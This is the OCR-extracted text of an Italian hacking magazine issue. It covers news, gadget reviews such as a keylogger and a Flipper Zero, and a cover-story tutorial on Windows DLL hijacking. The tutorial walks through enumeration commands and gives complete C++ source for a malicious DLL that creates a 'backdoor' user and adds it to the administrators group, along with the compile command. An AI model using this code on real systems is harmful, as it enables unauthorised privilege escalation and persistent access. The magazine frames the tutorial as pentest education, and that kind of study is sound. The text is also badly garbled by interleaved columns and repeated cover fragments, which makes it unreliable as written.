Sei sulla pagina 1di 64

SOLO ARTICOLI ORIGINALI DEI MIGLIORI ESPERTI IN CIRCOLAZIONE SIAMO

TOR
N.274 Novembre\Dicembre

TREMNAATTEI
SMARTPHONE
A PROVA
DI SPIA!
App 100% legali potrebbero nascondere
delle insidie. Le dritte per sgamarle

Dal 2002 tutto quello che gli altri non osano dirti
www.hackerjournal.it

La rete anticensura
oltre il DarkWeb
Si accede tramite un apposito tool
e ci si trova davvero l’impossibile.
Cosa abbiamo scoperto

Gothic 2 conquista
anche il Pinguino!
TARIFFA R.O.C. Poste Italiane S.p.A. – spedizione in abbonamento postale – MBPA/LO-NO/125/A.P./2017- ART.1 COMMA1- S /NA

Siamo riusciti a installare su Linux


questo mitico gioco di ruolo.
Ecco il diario della ricompilazione

ENDERSI
LA GUIDA PER DIF

Così entrano A PAGINA


10

in Windows
Gli utenti ignari installano una semplice DLL mancante
nel sistema e aprono così la porta ai pirati per sferrare un attacco
di Privilege Escalation nell’host target
PASSWORD
CRACKING
Come funziona un
DITE STOP AL IL MESSAGGIO
“attacco a dizionario”
per scoprire le chiavi
TRACCIAMENTO
Il tool consigliato da Anonymous
SI CELA TRA I PIXEL
Come nascondere testi e foto in
di accesso che protegge la tua privacy online un video grazie alla steganografia
IN EDICOLA
DAL 17 OTTOBRE

Scansiona il QR Code

Acquistala su www.sprea.it/psm
versione digitale disponibile dal 14 ottobre
EDITORIALE
www.hackerjournal.it
In questo numero parliamo di: DLL Hacking,
Ransomware Forensic, Metasploitable3,
Steganografia video, phishing, defacing,
Freenet, Gothic 2 e molto altro!

Innovazione criminale

M
i ha molto colpito l’intervento del
procuratore Nicola Gratteri, il quale ha
delineato un panorama preoccupante ma
anche illuminante sulla ’ndrangheta e il suo
“abbraccio dell’innovazione”. Questo spostamento
strategico ci mostra che la battaglia contro le mafie
non si svolge più solo nelle ombre dei vicoli, ma
anche nei meandri oscuri del digitale.
È inquietante pensare che persone dotate di
competenze avanzate in sicurezza informatica
possano trovarsi al servizio di organizzazioni
criminali. Questo solleva una questione cruciale per
la comunità hacker: quali valori si rappresentano? E
come ci si può differenziare da quegli individui che CONTATTI
scelgono di usare le loro abilità per scopi davvero REDAZIONE
poco condivisibili?! redazione@hackerjournal.it
Spero di sbagliarmi, ma sembra che le forze
ABBONAMENTI
dell’ordine italiane, una volta considerate tra le E ARRETRATI
migliori al mondo, siano ora in difficoltà, soprattutto abbonamenti@sprea.it
per la mancanza di risorse e investimenti. Eppure, www.sprea.it/digital
come dimostra l’FBI con la piattaforma Anom, la
FACEBOOK
giusta combinazione di tecnologia e strategia può www.facebook.com/
creare svolte decisive. A mio parere, tutti, ma hackerjournal/
proprio tutti, dobbiamo unire le forze e mettere le
SITO WEB
competenze al servizio del bene comune. www.hackerjournal.it
La sfida lanciata da Gratteri non può e non deve
cadere nel vuoto. La tecnologia, nelle mani giuste,
deve essere l’arma definitiva contro la criminalità.
La scelta, in pratica, spetta a noi.
Gianmarco Bruni

3
r Journa l sarà in edicola
Hacke pari
ogni 10 dei mesi dis

SOMMARIO
HACKTUALITÀ
News
Notizie e anticipazioni dell’universo hacker .................................................. 6

10

COVER STORY
Così entrano in Windows
Gli utenti ignari installano una semplice DLL mancante nel sistema
e aprono così la porta ai pirati per sferrare un attacco di Privilege
Escalation nell’host target. ....................................................................................... 10
Vulnerabilità | Il portachiavi in bella mostra
Un bug nella configurazione di Nginx per BitWarden, il noto gestore
di password, permette di sferrare un attacco brute force ........................... 16

What is | Ransomware Forensics: che cos’è?


È l’analisi di un attacco che consente di raccogliere le prove digitali per
meglio capire come si è verificata una violazione. Come funziona ......... 18

Bug fix | Porte aperte alla Toyota!


Un servizio dedicato ai responsabili commerciali di Toyota Messico,
nascondeva un bug. Svelati i retroscena! ........................................................... 20

AIUTACI A MIGLIORARE
RITA!
LA TUA RIVISTA PREFErjournal
ABBONATI ALLA
V ER SI ON E DIGITA LE
SOLO PER PC E MAC

Vai su https://bit.ly/h
acke
A SOLI 10,90 € onimo an
e compila il questionario
NTO: 1 ANNO
DURATA ABBONAME
al.it/abbonamenti
www.hackerjourn
Il primo manifesto hacker
“... avete mai guardato dietro agli occhi dell’hacker?
Vi siete mai chiesti cosa lo stimola, che forze
lo hanno formato, cosa può averlo forgiato?
Io sono un hacker, entra nel mio mondo...”

SICUREZZA Pentest
Metasploitable3 | E ora... il cracking delle password
Continua il corso su come aumentare le competenze da pentester...... 24

Steganografia | Il messaggio si cela tra i pixel


Come nascondere testi e foto in un video........................................................... 32

Cyberguerra | Phishing e defacing


Tecniche e strategie di protezione utilizzate
nel conflitto Russia-Ucraina .................................................................................... 38

Malware | Smartphone a prova di spia


App 100% legali potrebbero nascondere delle insidie.
>24
Le dritte per sgamarle................................................................................................. 42

Freenet
HOW TO
Reti P2P | La rete anticensura oltre il DarkWeb
Si accede tramite un apposito tool e ci si trova davvero l’impossibile.
Cosa abbiamo scoperto ..............................................................................................48

Privacy Badger | Dite STOP al tracciamento


Il tool consigliato da Anonymous che protegge la tua privacy online .... 50

Game | Gothic 2 conquista anche il Pinguino!


Siamo riusciti a installare su Linux il mitico gioco di ruolo.
Ecco il diario della ricompilazione ......................................................................... 52 48
NOI RISPETTIAMO L’AMBIENTE

HACKULTURE Hacker Journal è stato stampato


su carta certificata PEFC, proveniente
da piantumazioni a riforestazione
programmata e perciò gestite
Hacking e Musica | Il lato “sonoro” dell’hacking in maniera sostenibile.

Un connubio perfetto di codici e note ................................................................. 58

ttori, le risposte della redazione > 60


POSTA Le domande dei le
HACKTUALITÀ

NEWS
# S IC U R E Z Z A Son y nel mi ri no
TEMU POTREBBE
NASCONDERE dei criminal i?
UNO SPYWARE #RANSOMWARE “Come cancellare account su Playstation”.
L’emergente piattaforma cinese
è stata analizzata da un gruppo Stando a Google Trends, queste parole hanno registrato
di ricercatori che ha scoperto... un’impennata nelle ricerche del 277%. Motivo? La possibile
violazione dei sistemi della casa giapponese

L ’app sviluppata dalla PDD Holdings


Inc., è stata oggetto di una
dettagliata analisi da parte del gruppo S econdo quanto riposta il sito https://www.cybersecurityconnect.
com.au/, il colosso mondiale dell’intrattenimento sarebbe stato
di ricercatori Grizzly Research (https:// recentemente vittima di un devastante attacco ransomware. Ciò che
grizzlyreports.com/), che ha svelato renderebbe la notizia ancora più sorprendente è che gli autori di tale
alcuni preoccupanti indizi. Ovvero, la attacco sarebbero, relativamente, dei neofiti nel panorama. In base a
presenza di caratteristiche tipiche dei ciò che si legge, infatti, il tutto sarebbe riconducibile al gruppo
malware invasivi. Nello specifico, ha Ransomed.vc, che avrebbe iniziato le sue attività solo a settembre. La
individuato tre modalità di rivendicazione è apparsa sia sul Web che su Darknet: “Abbiamo
funzionamento critiche: la creazione di compromesso con successo tutti i sistemi di Sony. Non chiederemo un
software “invisibile” (può generare un
riscatto! Venderemo i dati. Questo a causa della riluttanza di Sony a
nuovo codice non rilevabile dalle
pagare. I DATI SONO IN VENDITA”, ribadendo poi con enfasi “STIAMO
scansioni di sicurezza), la concessione
VENDENDO TUTTO”.
di autorizzazioni nascoste (l’app ha
Il gruppo ha fornito
accesso alla fotocamera e al microfono,
utilizzi che non sono dichiarati nel poi alcune prove
documento principale Android Manifest) dell’attacco, ma a
e l’elaborazione dei dati dell’utente prima vista non
(Temu è in grado di accedere, leggere e sembrano
modificare una vasta gamma di file particolarmente
presenti nei dispositivi). Altro aspetto significative.
inquietante è che l’app trasmette i dati Hanno condiviso
raccolti ai suoi server in Cina, degli screenshot di
alimentando ulteriori dubbi sulla sua una pagina di accesso interna, una presentazione privata di
natura e sul possibile uso di queste PowerPoint, che mostra dettagli di una stazione di test, e alcuni file
informazioni. Grizzly Research ha tratto Java. Mentre l’industria della sicurezza informatica è in allerta, la
le conclusioni: Temu potrebbe veridicità e l’entità effettiva dell’attacco – nel momento in cui scriviamo
funzionare come un malware o – sono ancora oggetto di indagini approfondite. Una cosa è certa: la
spyware, con funzioni specifiche minaccia dei ransomware continua a evolversi e adattarsi, e le
per mascherare le sue intenzioni. organizzazioni di ogni dimensione e settore devono rimanere vigili.

6
NEWS
GLI HACKER
USA, rubate RUSSI CERCANO
60 mila email PROVE
#HACKING Durante un recente briefing al Senato, SUI CRIMINI
è stato rivelato che il furto delle caselle di posta
è stato realizzato nell’arco dell’estate
DI GUERRA
#CYBERGUERRA Di recente,

L ’incidente è stato catalogato come un episodio di “alto rilievo”.


La maggior parte delle comunicazioni violate riguarda le
manovre diplomatiche degli Stati Uniti nell’area dell’Indo-
è emersa una nuova tendenza:
la ricerca di documentazione
relativa ai presunti misfatti
Pacifico. Infatti, risulta che la stragrande maggioranza degli
ucraini
account compromessi, circa
nove su dieci, fossero dedicati a
tale ambito. La segretaria al
Commercio degli USA, Gina
G li attacchi, una volta
prevalentemente diretti
verso le infrastrutture
Raimondo, ha indicato con forti energetiche dell’Ucraina,
sospetti il coinvolgimento di sembrano avere ora un
hacker di origini cinesi, obiettivo diverso. Secondo un
sottolineando una possibile recente report del SSSCIP, l’ente
sponsorizzazione da parte del governo di Pechino. Ulteriori ucraino incaricato della
indagini stanno cercando di confermare o smentire queste protezione delle comunicazioni,
accuse. Nel corso di un’assemblea a Capitol Hill, alcuni dettagli vi è stato un marcato calo delle
dell’attacco sono stati ulteriormente approfonditi. Il portavoce offese al settore energetico.
del Dipartimento di Stato, Kelly Fletcher, ha sottolineato la Al contrario, si è osservato un
natura mirata dell’attacco. L’incidente solleva nuove aumento delle offensive contro
preoccupazioni sulla sicurezza delle comunicazioni ufficiali e la le istituzioni giuridiche, incluse
necessità di rafforzare le misure di protezione per prevenire le forze dell’ordine, tribunali e
ulteriori compromissioni in futuro. procure. Un cambio di direzione
che indica un chiaro intento:
rintracciare documenti che

GRATTERI: “CONTRO LE MAFIE


possano fungere da prova dei
crimini di guerra perpetrati

C’È BISOGNO DI ESPERTI dalle forze russe nel corso del


conflitto.
DI SICUREZZA E HACKER”
#TREND “La ’ndrangheta ha abbracciato l’innovazione, dall’utilizzo di strumenti telematici
avanzati alla crittografia, e si è immersa nel mondo delle criptovalute e del DarkWeb”

S ono parole del procuratore Nicola Gratteri che, durante l’evento Librixia, ha
presentato il suo recente saggio, co-scritto con Antonio Nicaso, dal titolo «Fuori
dai confini. La ‘ndrangheta nel mondo», edito da Mondadori. “Le recenti indagini – ha
dichiarato il magistrato – hanno rivelato un utilizzo crescente di esperti e hacker, in
particolare di nazionalità tedesca e rumena, capaci di movimentare enormi somme
di denaro in pochissimo tempo, rendendo quasi impossibile rintracciarne le origini”.
Gratteri ha evidenziato anche la scarsità di risorse e l’insufficienza di investimenti
nel settore. “Anche se una volta la Polizia giudiziaria italiana veniva considerata tra
le migliori al mondo, le assunzioni sono state congelate per anni, rallentando
l’adattamento alle nuove minacce. L’FBI, ad esempio, ha saputo contrastare la
criminalità con l’utilizzo strategico della tecnologia, come dimostra il successo della
piattaforma Anom”.

7
GADGET DA HACKER
HACKTUALITÀ
MULTITO OL
SCA C’È UN PICCOLO GENIO
IN TA 239,95
euro
https://www.short.tips/url/amflipperzero

I l mondo dell’hacking e della


sicurezza informatica ha visto
negli anni l’introduzione di
un’antenna da 433 MHz integrata
che gli permette di interagire con
dispositivi come porte da garage
permesso a
sviluppatori di tutto il
mondo di migliorare e
numerose soluzioni hardware, o sensori IoT, mentre il modulo personalizzare il dispositivo,
ma poche hanno suscitato tanto RFID e NFC consente di leggere e creando firmware personalizzati
interesse quanto il Flipper Zero. emulare diversi tipi di tag. C’è la e funzionalità aggiuntive. Occhio,
Un dispositivo di cui abbiamo presenza del modulo Bluetooth, però, Flipper Zero non è uno
parlato più volte anche sulle che permette una facile strumento per fare del male, ma
pagine della nostra rivista. integrazione con dispositivi piuttosto per da utilizzare per la
Pensato come uno strumento esterni come smartphone o ricerca, l’apprendimento e, in
multifunzionale per gli tablet. E tanto altro… Ma Flipper molti casi, l’hacking etico. Grazie
appassionati di tecnologia, Zero non è solo un aggregato di a Flipper Zero, i professionisti
integra in un unico dispositivo moduli. Ciò che lo rende unico è della sicurezza possono testare
tutte le funzionalità necessarie l’approccio open-source adottato le vulnerabilità dei sistemi e
per testare, emulare e interagire dai suoi creatori, che ha portato sviluppare soluzioni per
con una vasta gamma di alla nascita di una community proteggere le reti e le
protocolli e sistemi. Ha attiva e dedicata. Ciò ha infrastrutture.

KEY LOG GER HAR DWA RE SNIF FER BLU ETO OTH
Non farti ingannare UN LABORATORIO
dalle dimensioni! DI ANALISI BLE
https://www.short.tips/url/sniffkeywifi TASCABILE
https://www.short.tips/url/sniffble
N onostante le dimensioni ridotte (appena 10 mm di
lunghezza), AirDrive Forensic Keylogger è una potente
soluzione per la registrazione delle sequenze di tasti
premuti su qualsiasi tastiera USB. Una delle sue principali
U na volta inserito nella porta USB,
inizierà immediatamente a raccogliere
e a trasmettere i dati sulla sessione di
caratteristiche, infatti, è la capacità di registrare fino a comunicazione. “Annuserà” in tempo reale
8000 pagine di testo, grazie a una memoria flash interna da e vi restituirà una comprensione
16 MB. Supporta oltre 40 layout di tastiera: ciò significa che, approfondita del traffico Bluetooth. Il
indipendentemente dalla lingua o dal paese in cui viene vantaggio principale di questo sniffer
utilizzato, è in grado di registrare accuratamente ogni tasto. rispetto ad altri strumenti simili è la sua
La funzionalità Wi-Fi, poi, lo rende davvero unico: agisce integrazione diretta con Wireshark, uno
come un hotspot, permettendo agli utenti di connettersi al dei più popolari strumenti di analisi di rete,
dispositivo da computer, smartphone o tablet. Questo che offre un’interfaccia utente intuitiva e
elimina la necessità di un accesso fisico al keylogger per una vasta gamma di funzionalità di
recuperare i dati. Oltre a tutto ciò, integra misure di filtraggio e ricerca. Il suo firmware è stato
sicurezza avanzate, tra cui la crittografia hardware e il ottimizzato per garantire che ogni
supporto per protocolli di sicurezza di rete come WEP, WPA pacchetto venga catturato con precisione
e WPA-2. e senza perdite, una precisione essenziale
quando si tratta di debug o analisi di
problemi di connettività.
113,99 41,24
euro euro

8
H AC K T U A L I TÀ
COVER STORY Così entrano in Windows
Gli utenti ignari installano una semplice DLL mancante nel sistema
e aprono così la porta ai pirati per sferrare un attacco di Privilege Escalation
nell’host target ����������������������������������������������������������������������������������������������������������������������������������������������������� 10

VULNERABILITÀ Il portachiavi in bella mostra


Un bug nella configurazione di Nginx per BitWarden, il noto gestore
di password, permette di sferrare un attacco brute force ������������������������������������������������������ 16

WHAT IS Ransomware Forensics: cos’è e come funziona


È l’analisi di un attacco che consente di raccogliere le prove digitali per meglio
capire come si è verificata una violazione. Quando si usa ������������������������������������������������������ 18

BUG FIX Porte aperte alla Toyota!


Un servizio dedicato ai responsabili commerciali di Toyota Messico,
nascondeva un bug. Svelati i retroscena! ������������������������������������������������������������������������������������������ 20

9
HACKTUALITÀ
RY: Così entrano in Windows
COVER STO

Così entrano
in Windows
ri inst al lano un a se m plice DL L m an cante
Gli utenti igna ti pe r sferrare
a e ap ro no così la po rta ai pira
nel sistem st target
ta cc o di Priv ile ge Es ca lation ne ll’ho
un at
codice non devono essere caricate all’interno dell’host target.

P
artiamo con delle
definizioni. La prima: una in memoria per ogni applicazione. Esplicitate queste definizioni,
dynamic-link library (DLL) è • Estendibilità: le DLL possono vediamo la strada che un criminale
una libreria che viene essere aggiunte o aggiornate senza dovrebbe percorrere per sfruttare
caricata, in fase di esecuzione, da un dover modificare o reinstallare appieno quest’ultima tecnica.
dato programma Windows che ne l’applicazione che le utilizza. Ciò Facciamolo leggendo le pagine che
fa uso. Essa contiene codice e dati permette alle applicazioni di essere seguono, scritte come un tutorial
che possono essere utilizzati anche ampliate o aggiornate in modo che vi guida passo dopo passo.
da più programmi. L’utilizzo delle dinamico. La seconda: la tecnica Buona lettura.
DLL ha diversi vantaggi... del DLL Hijacking. In ambienti
• Riutilizzo del codice e Windows, prevede che, quando LO SCENARIO
modularità: il codice contenuto in viene eseguita un’applicazione o un Supponete di essere riusciti a
una DLL può essere utilizzato da servizio, essi utilizzano una serie di ottenere l’accesso a un host
più applicazioni. Ciò significa che gli DLL. Se una di queste DLL non viene Windows appartenente alla rete
sviluppatori possono creare librerie trovata dal programma che la dell’ipotetica company target e di
di funzioni comuni, riutilizzabili da utilizza, o il suo caricamento avviene aver scoperto, a seguito di
più applicazioni. Questo porta alla da un “path” con miss-configuration un’accurata fase di enumerazione
modularità del codice e rende più dei permessi, è possibile effettuare del target, che potete sfruttare la
facile la manutenzione e un attacco di Privilege Escalation tecnica di DLL Hijacking per elevare i
l’aggiornamento, dato che una
modifica in una DLL può figura #1
interessare tutte le applicazioni che
la utilizzano.
• Risparmio di memoria: poiché il
codice in una DLL può essere
condiviso tra più applicazioni, ne
consegue un risparmio di memoria,
dato che più copie dello stesso

10
NE SIAMO
MIGLIORI ESPERTI IN CIRCOLAZIO
SOLO ARTICOLI ORIGINALI DEI TORNATI
TREMATE
SMARTPHONE

embre
A PROVA

N.274 Novembre\Dic
DI SPIA!
App 100% legali potrebbero
nascondere
sgamarle
delle insidie. Le dritte per

gli altri non osano dirti


Dal 2002 tutto quello che

www.hackerjournal.it
La rete anticensura
oltre il Dark Web
un apposito tool
Si accede tramite .
e ci si trova davvero l’impossibile
Cosa abbiamo scoperto

Gothic 2 conquista
o
anche il Pinguinsu

COMMA1- S /NA
Linux
Siamo riusciti a installare
ruolo.
questo mitico gioco di

– MBPA/LO-NO/125/A.P./2017- ART.1
ne
Ecco il diario della ricompilazio
DERSI
PER DIFEN
LA GUIDA

Così entrano

– spedizione in abbonamento postale


A PAGINA
10

in Windows

TARIFFA R.O.C. Poste Italiane S.p.A.


una semplice DLL mancante
Gli utenti ignari installano ai pirati per sferrare un attacco
la porta
nel sistema e aprono così Escalation nell’host target
di Privilege

PASSWORD IL MESSAGGIO
CRACKING DITE STOP AL SI CELA TRA I PIXEL
Come funziona un
“attacco a dizionario” TRACCIAMENTO
Il tool consigliato da Anonymous
Come nascondere testi
e foto in
un video grazie alla steganografia
per scoprire le chiavi che protegge la tua privacy
online
di accesso

figura #2 servizio) e “PathName” (percorso del


file eseguibile del servizio).
3) Where-Object {$_.State
-like ‘Running’}: questo filtro,
applicato tramite il cmdlet Where-
Object, seleziona solo gli oggetti in
cui lo stato del servizio corrisponde
Get-CimInstance -ClassName
permessi all’interno della macchina. a “Running”. In pratica, restituisce
win32_service | Select
L’indirizzo IP del target è solo i servizi che sono attualmente
Name,State,PathName | Where-
192.168.178.109 mentre l’indirizzo in esecuzione. Dopo un’accorta
Object {$_.State -like
IP dell’ attaccante è: 192.168.178.108. analisi dei servizi, uno fra tutti ha
‘Running’}
attirato l’attenzione:
PASSO 1: ENUMERATION BginfoService[figura #4].
Nella prima fase dell’enumerazione Considerando che: Difatti, l’ipotetico amministratore ha
visualizzate l’elenco dei privilegi 1) Get-CimInstance -ClassName creato un servizio in Windows che
assegnati all’account utente con cui win32_service: recupera istanze punta a un file binario Bginfo64.exe.
effettuate l’accesso, tramite il della classe win32_service Verificate con quali permessi il
comando whoami/priv. utilizzando il cmdlet Get- servizio sta girando, utilizzando il
[figura #1] Il permesso che vi CimInstance. La classe win32_ comando:
interessa è SeShutdownPrivilege service Get-WmiObject -Class Win32_
che rappresenta un potenziale contiene informazioni sui servizi di Service | Where-Object {$_.
modo per poter fare il restart di un Windows presenti nel sistema. Name -eq “NomeServizio”} |
dato servizio, in quanto l’utente non 2) Select Select-Object Name, StartName
dispone di tali privilegi, necessari Name,State,PathName: [figura #5]
(per esempio) per poter lanciare un seleziona specifiche proprietà degli Il servizio gira come LocalSystem.
comando di Restart-Service da oggetti restituiti dalla classe win32_ L’account LocalSystem è un account
powershell. Dopo aver enumerato service. In particolare, vengono speciale nel sistema operativo
gli utenti locali presenti sulla selezionati i campi “Name” (nome Windows. Esso ha privilegi di
macchina, tramite il comando del servizio), “State” (stato del accesso più elevati rispetto agli
Get-LocalUser, vi accorgerete che
oltre all’account di nome “Blue” con
cui avete effettuato l’accesso ne Gli altri permessi utili
esiste un altro “Admin” [figura #2].
Come è facile intuire, l’utente “Blue” 1. SeShutdownPrivilege è il permesso di spegnimento del sistema:
(con cui vi siete loggati) a differenza consente all’utente di spegnere o riavviare il sistema;
2. SeChangeNotifyPrivilege è il permesso di notifica di modifica: consente
dell’utente “Admin”, non dispone di
all’utente di ricevere notifiche quando avvengono modifiche in una cartella
privilegi elevati, mentre l’utente o in un oggetto di sistema;
Admin è presente nel gruppo 3. SeUndockPrivilege è il permesso di rimozione del computer portatile
“Administrators” [figura #3]. dalla docking station: consente all’utente di rimuovere un computer
La fase di enumerazione si è portatile da una docking station senza incorrere in problemi o errori;
concentrata, dunque, sui servizi in 4. SeIncreaseWorkingSetPrivilege è il permesso di incrementare il set di
lavoro: consente all’utente di aumentare la quantità di memoria fisica (RAM)
stato di “Running” presenti sulla
che un’applicazione può utilizzare;
macchina vittima. Per visualizzare 5. SeTimeZonePrivilege è il permesso di modifica del fuso orario: consente
tutti i permessi in Running sulla all’utente di modificare il fuso orario del sistema, influenzando l’orario
macchina Windows dovete visualizzato e l’elaborazione delle informazioni temporali.
utilizzare il seguente comando:

11
HACKTUALITÀ
RY: Così entrano in Windows
COVER STO
figura #3 tabella #1
MASK PERMISSIONS
F Full access
M Modify access
RX Read and execute access
R Read-only access
W Write-only access

sfondo del desktop. Le informazioni


visualizzate possono essere
configurate dall’utente,
consentendo di scegliere quali
dettagli del sistema mostrare.
figura #4 Il programma è spesso utilizzato
dagli amministratori di sistema per
visualizzare le informazioni di
sistema sui server e sulle
workstation.

PASSO 2: GHOST DLL


L’obiettivo adesso è trovare le DLL
mancanti, che vengono caricate
all’esecuzione del programma
BgInfo. Analizzate separatamente
account utente standard e, in All’interno della cartella è presente l’esecuzione dell’eseguibile BgInfo,
pratica, ha pieno controllo su ogni l’eseguibile BgInfo64.exe. tramite l’utility Process Monitor.
aspetto del sistema operativo. Ed è BgInfo64.exe è un programma Supponete che l’attaccante abbia
l’account predefinito utilizzato da gratuito fornito da Microsoft allestito per l’occasione una
molti servizi Windows. Verificate ora all’interno della suite di utility macchina di laboratorio per
i permessi di cui disponete sulla Sysinternals. BgInfo (Background analizzare l’esecuzione del file
cartella C:\Tools\BgInfo\ attraverso Information) è uno strumento che binario BgInfo64.exe. Process
il comando icacls [tabella #1] consente di visualizzare dettagli sul Monitor è uno strumento avanzato
[figura #6]. sistema, come il nome del per il monitoraggio e la
L’utente dispone dei permessi per computer, l’indirizzo IP, la versione registrazione in tempo reale dei
aggiungere o modificare un file del sistema operativo, e altro processi in ambiente Windows,
all’interno della cartella. ancora, direttamente sullo sfondo scaricabile al seguente link: https://
Note: l’attuale miss-configuration del desktop. Una volta eseguito, learn.microsoft.com/it-it/sysinternals/
dell’host lo rende anche vulnerabile BgInfo raccoglie le informazioni del downloads/procmon
ad una tecnica di Privilege Escalation sistema e genera un’immagine L’utility BgInfo è scaricabile a questo
nota come Binary Hijacking. bitmap che viene impostata come indirizzo: https://learn.microsoft.com/

figura #5

12
NE SIAMO
MIGLIORI ESPERTI IN CIRCOLAZIO
SOLO ARTICOLI ORIGINALI DEI TORNATI
TREMATE
SMARTPHONE

embre
A PROVA

N.274 Novembre\Dic
DI SPIA!
App 100% legali potrebbero
nascondere
sgamarle
delle insidie. Le dritte per

gli altri non osano dirti


Dal 2002 tutto quello che

www.hackerjournal.it
La rete anticensura
oltre il Dark Web
un apposito tool
Si accede tramite .
e ci si trova davvero l’impossibile
Cosa abbiamo scoperto

Gothic 2 conquista
o
anche il Pinguinsu

COMMA1- S /NA
Linux
Siamo riusciti a installare
ruolo.
questo mitico gioco di

– MBPA/LO-NO/125/A.P./2017- ART.1
ne
Ecco il diario della ricompilazio
DERSI
PER DIFEN
LA GUIDA

Così entrano

– spedizione in abbonamento postale


A PAGINA
10

in Windows

TARIFFA R.O.C. Poste Italiane S.p.A.


una semplice DLL mancante
Gli utenti ignari installano ai pirati per sferrare un attacco
la porta
nel sistema e aprono così Escalation nell’host target
di Privilege

PASSWORD IL MESSAGGIO
CRACKING DITE STOP AL SI CELA TRA I PIXEL
Come funziona un
“attacco a dizionario” TRACCIAMENTO
Il tool consigliato da Anonymous
Come nascondere testi
e foto in
un video grazie alla steganografia
per scoprire le chiavi che protegge la tua privacy
online
di accesso

figura #6
I file .cpp
n file .cpp è un file sorgente
U scritto nel linguaggio di
it-it/sysinternals/downloads/BgInfo L’ultimo filtro lo imposterete per programmazione C++. Questo
Considerate che, nell’esempio, si sta mostrarvi le DLL che non sono state tipo di file contiene codice
sorgente C++ che può essere
utilizzando l’ultima versione trovate all’esecuzione.
compilato in un programma o
disponibile sul sito Microsoft 4.32. una libreria eseguibile. I file .cpp
Quindi: • Result is NAME NOT FOUND sono tipicamente usati per
1) Lanciate l’eseguibile: Procmon64. then Include l’implementazione di codice,
exe [figura #9] mentre i file di intestazione (.h o
2) Dal menu in alto selezionate la .hpp) sono usati per
dichiarazioni di classi, funzioni e
voce Filter e dal menu a tendina Applicate i filtri con il tasto “Apply” e
altri identificatori.
ancora “Filter…” cliccate “OK”. Lanciate adesso Il C++ è un linguaggio di
3) Adesso impostate tre filtri per l’applicazione da analizzare, nel programmazione di alto livello
individuare le DLL target mancanti. vostro caso BgInfo64.exe. ProcMon, che supporta sia la
Tramite il tasto “Remove” potete vi mostrerà i risultati secondo i programmazione procedurale
rimuovere i filtri già preimpostati. nostri filtri di ricerca: tutte le DLL che quella orientata agli oggetti.
È largamente utilizzato in una
Il primo filtro dovrà mostrarvi “fantasma” che l’eseguibile tenta di
varietà di applicazioni, che
esclusivamente gli eventi del caricare in fase di startup, ma che vanno dallo sviluppo di sistemi
processo in oggetto: BgInfo64.exe. non trova. [figura #10] operativi e browser web fino a
Per fare ciò, impostatelo nel giochi e applicazioni per il
seguente modo: PASSO 3: CREATE trading algoritmico.
MALICIOUS DLL
• Process Name is BgInfo64.exe Per generare la DLL malevola utilizzeremo (DllMain è la
then Include avete diverse opzioni. Potrete funzione di entry point per la DLL
generarne una attraverso e viene chiamata quando la DLL
Add per aggiungere il filtro msfvenom oppure scrivere il viene caricata e scaricata. Il
[figura #7]. codice in C++: come detto, le DLL parametro ul_reason_for_call
Il secondo filtro deve mostrarvi sono moduli di codice che indica il motivo per cui DllMain è
esclusivamente le DLL possono essere caricati ed stata chiamata):
•Path ends with .dll then eseguiti da qualsiasi programma • #include <stdlib.h> e
Include su Windows. #include <windows.h>: librerie
[figura #8] Ecco il codice malevolo che standard necessarie per

figura #7 figura #8

13
HACKTUALITÀ
RY: Così entrano in Windows
COVER STO
figura #9 figura #10

l’esecuzione del codice. • case DLL_THREAD_ATTACH: HANDLE hModule,


• BOOL APIENTRY DllMain( viene eseguito quando un DWORD ul_reason_for_call,
HANDLE hModule, DWORD processo crea un nuovo thread LPVOID lpReserved )
ul_reason_for_call, LPVOID (in questo caso non accade {
lpReserved): dichiarazione nulla). switch ( ul_reason_for_call )
della funzione DllMain. I suoi • case DLL_THREAD_DETACH: {
parametri sono un handle al viene eseguito quando un thread case DLL_PROCESS_ATTACH:
modulo DLL, il motivo per cui la esce normalmente (in questo
funzione è stata chiamata e un caso non accade nulla). int i;
puntatore a un valore “riservato”. • case DLL_PROCESS_DETACH: i = system (“net user backdoor
• switch (ul_reason_for_ viene eseguito quando un qwerty123! /add”);
call): lo switch fornisce diverse processo scarica la DLL (in i = system (“net localgroup
opzioni a seconda del motivo per questo caso non accade nulla). administrators backdoor /add”);
cui DllMain è stata chiamata. • return TRUE;: la funzione break;
• case DLL_PROCESS_ATTACH: ritorna TRUE per indicare che case DLL_THREAD_ATTACH:
viene eseguito quando un l’operazione è stata eseguita con break;
processo carica la DLL. Il codice successo. Riassumendo: quando case DLL_THREAD_DETACH:
esegue due comandi di sistema: il codice verrà avviato, all’interno break;
net user backdoor dello switch il “case” DLL_ case DLL_PROCESS_DETACH:
qwerty123! /add e net PROCESS_ATTACH creerà un break;
localgroup administrators backdoor user aggiungendolo al }
backdoor /add. Questi gruppo degli amministratori. return TRUE;
comandi creano un nuovo utente Ecco il codice per intero: }
chiamato “backdoor” con la Salvatelo in un file .cpp e
password “qwerty123!” e #include <stdlib.h> compilatelo. Il nome è quello di
aggiungono poi l’utente al #include <windows.h> una delle DLL non trovate in fase
gruppo di amministratori. BOOL APIENTRY DllMain( di caricamento di BgInfo64.exe,
che abbiamo visto durante la
figura #11 fase di analisi con Process
Monitor. Scegliamo il nome
WINSTA.dll.

x86_64-w64-mingw32-gcc
DLLrogue.cpp --shared -o
WINSTA.dll
[figura #11]

14
NE SIAMO
MIGLIORI ESPERTI IN CIRCOLAZIO
SOLO ARTICOLI ORIGINALI DEI TORNATI
TREMATE
SMARTPHONE

embre
A PROVA

N.274 Novembre\Dic
DI SPIA!
App 100% legali potrebbero
nascondere
sgamarle
delle insidie. Le dritte per

gli altri non osano dirti


Dal 2002 tutto quello che

www.hackerjournal.it
La rete anticensura
oltre il Dark Web
un apposito tool
Si accede tramite .
e ci si trova davvero l’impossibile
Cosa abbiamo scoperto

Gothic 2 conquista
o
anche il Pinguinsu

COMMA1- S /NA
Linux
Siamo riusciti a installare
ruolo.
questo mitico gioco di

– MBPA/LO-NO/125/A.P./2017- ART.1
ne
Ecco il diario della ricompilazio
DERSI
PER DIFEN
LA GUIDA

Così entrano

– spedizione in abbonamento postale


A PAGINA
10

in Windows

TARIFFA R.O.C. Poste Italiane S.p.A.


una semplice DLL mancante
Gli utenti ignari installano ai pirati per sferrare un attacco
la porta
nel sistema e aprono così Escalation nell’host target
di Privilege

PASSWORD IL MESSAGGIO
CRACKING DITE STOP AL

figura #12
Come funziona un
“attacco a dizionario” TRACCIAMENTO SI CELA TRA I PIXEL
Come nascondere testi
e foto in
per scoprire le chiavi Il tool consigliato da Anonymous
online un video grazie alla steganografia
